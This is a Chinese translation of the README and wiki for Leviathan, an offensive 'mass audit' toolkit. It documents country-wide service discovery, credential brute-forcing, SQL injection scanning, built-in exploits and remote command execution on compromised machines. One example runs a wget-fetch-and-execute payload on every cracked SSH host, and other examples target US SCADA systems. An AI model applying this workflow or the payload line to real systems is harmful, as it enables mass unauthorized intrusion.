Leviathan是一个大规模的审计工具包,具有广泛的服务发现,暴力破解,SQL注入检测和运行用户定制漏洞的能力。它包含开源工具,例如masscan,ncrack,dsss,并为您提供组合使用它们的灵活性。
该项目的主要目标是在全国范围内或在广泛的IP范围内审计尽可能多的系统。
服务发现:通过Sensan,Censys发现在特定国家或IP范围内运行的FTP,SSH,Telnet,RDP,MYSQL服务。还可以通过集成的“masscan”工具手动发现IP范围上的运行服务。
简短演示:https://asciinema.org/a/617bsxl1y84bav9f5bcwllx7r
暴力破解:您可以通过集成的“ncrack”工具暴力破解发现的服务。它具有包含最受欢迎的组合和特定服务的默认密码的单词列表。
简短演示:https://asciinema.org/a/43y2j38zu7hbnuahrj233d5r0
远程命令执行:您可以在受感染的设备上远程运行系统命令。
简短演示:https://asciinema.org/a/0xcrhd12f2lpkbktjldwtab16
SQL注入扫描器:发现具有特定国家/地区扩展或您自定义Google Dork的网站上的SQL注入漏洞。
简短演示:https://asciinema.org/a/2mwfmd9afsuyg5p0vzcq5e6si
利用特定的漏洞:用Shodan,Censys或Masscan发现易受攻击的目标,并通过提供自己的漏洞利用工具或使用预先包含的漏洞利用工具来利用这些漏洞。
简短演示:https://asciinema.org/a/9uqsjvnru780h0ue6ok9j9ktb
Masscan :这是由Robert David Graham开必的非常快速的TCP端口扫描器。 Leviathan使用masscan来检测巨大IP范围内的服务。 https://github.com/robertdavidgraham/masscan
Ncrack :Ncrack是一种高速网络身份验证破解工具。 Leviathan使用ncrack来暴力破解FTP,SSH,RDP,Telnet,MYSQL等服务。https://github.com/nmap/ncrack
DSSS(Damn Small SQLi Scanner):DSSS是Miroslav Stampar的功能齐全而又小巧的SQL注入漏洞扫描程序。 Leviathan使用DSSS来识别特定URL上的SQL注入漏洞。 https://github.com/stamparm/DSSS
有关详细的安装,请访问我们的wiki页面。
通过克隆Git仓库下载leviathan:
`git clone https://github.com/leviathan-framework/leviathan.git`
进入文件夹
`cd leviathan`
安装Python库:
`pip install -r requirements.txt`
完成!
通过克隆Git仓库下载leviathan:
`git clone https://github.com/leviathan-framework/leviathan.git`
进入文件夹
`cd leviathan`
运行安装脚本。它将安装所需的工具(ncrack,masscan)和python库。
`bash scripts/debian_install.sh`
完成!
如果系统上未安装homebrew,请先安装:
`/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"`
通过克隆Git仓库下载leviathan:
`git clone https://github.com/leviathan-framework/leviathan.git`
进入文件夹
`cd leviathan`
运行安装脚本。它将安装所需的工具(ncrack,masscan)和python库。
`bash scripts/macos_install.sh`
完成!
Python版本2.7.x是运行此程序所必需的。
支持的平台:Linux(Kali Linux,Debian,Ubuntu),macOS
使用以下命令运行程序:
`python leviathan.py`
您可以在菜单中获取基本使用信息。有关详细的使用手册,请访问我们的wiki页面。
该项目由Utku Sen和Ozge Barbaros撰写
我们的比特币地址:13m5tKkY2TUVskkaCbLEqU1VN8daAUvJS8
虽然这可能对一些人有帮助,但存在重大风险。即使你是无辜的,你可能仅因运行leviathan而受到司法指控而入狱。您应注意到,在“自己”的环境之外使用这种工具被认为是恶意的,违反了法律。请谨慎使用。
译注:其wiki有更详细的工具用法介绍,如果有必要我可以找个时间翻译。
来源:https://github.com/leviathan-framework/leviathan
本文由 看雪翻译小组 hanbingxzy 编译
首页 Home
资产菜单 Assets Menu
攻击菜单 Attack Menu
配置菜单 Configuration Menu
发现菜单 Discovery Menu
安装 Installation
获取KEY Obtaining The API Keys
自定义漏洞利用 Writing Custom Exploits
欢迎来到Leviathan的维基。以下文档将让您能够使用Leviathan具有的所有功能。
1.要在特定系统上安装Leviathan,请访问Installation页面。
2.您需要生成“Google Custom Search”,“Shodan”和“Censys” API keys才能使用该程序。详情请访问Obtaining The API Keys页面。
3.key生成后,您需要向Leviathan提供这些keys。页面教程Configuration Menu会告诉你如何配置。
4.可以使用Leviathan了。
- 要发现设备和网站,请访问“Discovery Menu”页面
- 要对之前发现的目标进行特定攻击,请访问“Attack Menu”页面
- 要查看发现的和被攻陷的设备,请访问“Assets Menu”页面
- 有关编写自己定制的漏洞利用的更多详细信息,请访问“Writing Custom Exploits”页面
Assets Menu允许您查看发现的或被攻陷的机器。
要检查发现的设备,请在Assets Menu中选择选项1(显示发现的计算机)。
查看时可以通过协议过滤,也可以查看所有已发现的机器。格式如下:
然后,您可以通过输入他们的ID来查看它们。
要检查被攻陷的设备,请在Assets Menu中选择选项2(显示被攻陷的机器)。
查看时可以通过协议过滤,也可以查看所有已发现的机器。格式如下:
然后,您可以通过输入他们的ID来查看它们。
视频演示:https://www.youtube.com/watch?v=pxad6OwQieE
攻击模块中,您可以对发现模块中发现的目标运行特定的攻击。如果您没有发现任何目标,则无法进行攻击。因此请访问“Discovery Menu”页面。
成功的攻击保存在“/assets/compromised”文件夹下,格式如下:
例如:ncrack_ssh_8593212.txt
在“暴力破解”部分,您可以对以下协议进行暴力攻击:ftp,ssh,telnet,rdp,mysql。用于暴力攻击的单词列表放在“/config/wordlists”文件夹下。如果要使用不同的组合,您可以编辑它们。
成功的暴力攻击以以下格式保存:
例如:root:123456:1.1.1.1
在本节中,您可以通过提供发现id来运行暴力攻击。要获取扫描的发现id,请访问“资产菜单 Assets Menu”菜单。例如,您使用Censys来对ssh服务进行扫描。进入“资产菜单 Assets Menu”菜单,并进入菜单:“Show discovered machines(显示发现的机器)” -->“ssh”。它会向你列出这些信息:
复制发现ID部分(8275412),并输入Brute Force/Attack(暴力攻击)中进行使用。Leviathan自动对发现的IP地址进行暴力攻击。
在本节中,您不需要提供发现ID。您需要选择协议(例如:ssh),Leviathan对运行SSH的所有已发现的IP地址进行暴力攻击。
在本节中,您可以在之前搜索到URL上进行SQL注入漏洞搜索。如果目标URL容易受到SQL注入攻击,Leviathan会将URL保存在“/assets/compromised”文件夹中,如上所述。
与“暴力破解”部分相同,您有两个选项可以选择:
1)用发现的ID攻击
2)攻击发现的所有机器
细节上与“暴力破解”部分相同。
可用的漏洞位于“/lib/exploits”文件夹下。如果要实现自己的漏洞利用,则需要将其放在该目录下。有关编写自定义漏洞的更多信息,请访问“编写自定义漏洞利用 Writing Custom Exploits”页面。
要运行内置的漏洞利用工具,请从主菜单中进入攻击菜单,然后进入自定义漏洞利用部分。在这里,您需要提供目标的发现ID。如果您没有有关发现ID的信息,请访问“资产菜单 Assets Menu”部分。
提供发现ID后,您需要选择针对目标运行的漏洞利用。键入漏洞名称(示例:shellshock),然后按Enter键。
在“运行远程命令”部分中,您可以在攻陷的机器上远程执行命令。您需要在“暴力破解”部分中破解SSH密码才能使用此部分。
与“暴力破解”和“Web”部分相同,您有两个选项可以选择:
1)按发现ID运行命令
2)在所有发现的机器上运行命令
获取发现ID和详细信息,请参见“暴力破解”部分。
以下示例显示如何在所有破解的ssh服务上运行命令(仅支持Unix Bash命令)
- 选择菜单中的选项2 -
输入您的命令:wget http://utkusen.com/s.pl && chmod +x s.pl && ./s.pl
在本节中,您可以更改Google,Shodan或Censys的API密钥。 如果您还没有API密钥,请访问“获取KEY Obtaining The API Keys”页面。
1.运行程序:python leviathan.py
2.在主菜单中,按4进入配置菜单。
3.现在,您需要通过在菜单中选择相应的数字来填充每个部分(Google API密钥,Google CSE ID,Censys UID,Censys 密码,Shodan API密钥)
此外,您也可以手动在leviathan_config.py文件中添加API密钥。
视频演示:https://www.youtube.com/watch?v=PFGU-eOfXuU
发现模块可帮助您识别运行特定服务的机器。您可以使用Shodan或Censys API提取之前发现的机器,或者您可以使用masscan工具自己扫描。此外,您可以根据Google的dork发现网站。确保您提供了Shodan,Censys和Google API的密钥,以便使用这些功能。
所有发现的目标都保存在“/assets/discovered”文件夹下,格式如下:
如:censys_ssh_8593212.txt
您可以在“资产菜单 Assets Menu”中查看发现的目标。有关详细信息,请访问其wiki页面。
Shodan模块将通过Shodan的API提取预发现的机器。
在“自动查询”部分,您可以通过输入国家代码和服务类型来生成Shodan搜索查询和查找机器。以下示例显示如何收集在土耳其运行SSH的IP地址。
在本节中,您可以编写自己的Shodan查询。有关语法,请访问:https://www.shodan.io/
以下示例显示如何收集在伊斯坦布尔运行Apache的IP地址:
Censys模块可通过Censys的API提取预发现的机器。
在“自动查询”部分,您可以通过提供国家代码和服务类型来生成Censys搜索查询和查找机器。以下示例显示如何收集在土耳其运行SSH的IP地址。
在本节中,您可以编写自己的Shodan(注:应该是Censys)查询。有关语法,请访问:https://censys.io/
以下示例显示了如何收集美国IP地址SCADA系统:
使用masscan,您可以发现运行特定服务的IP范围中的设备。以下示例显示如何收集在83.49.0.0/16范围内运行SSH的IP地址。
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!